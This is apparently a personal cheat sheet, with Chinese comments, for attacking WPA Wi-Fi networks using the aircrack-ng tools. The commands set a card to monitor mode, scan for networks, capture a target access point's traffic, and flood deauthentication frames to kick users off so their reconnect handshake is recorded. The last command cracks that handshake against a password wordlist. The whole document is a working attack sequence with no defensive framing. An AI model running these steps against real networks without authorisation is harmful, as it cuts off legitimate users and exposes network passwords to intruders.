airmon-ng start wlan0

airodump-ng wlan0mon #扫描WIFI

airodump-ng -c CH值 --bssid BSSID值 -w wifi wlan0mon
存在用户连接

aireplay-ng -0 0 -a (BSSID) -c (STATION) wlan0mon
等待用户重连

aireplay-ng -0 10 -a 路由器的bssid值 -c 目标mac地址 wlan0mon
aircrack-ng -a2 -b bssid -w /usr/share/seclists/wifi_top2000_passwd.txt text-01.cap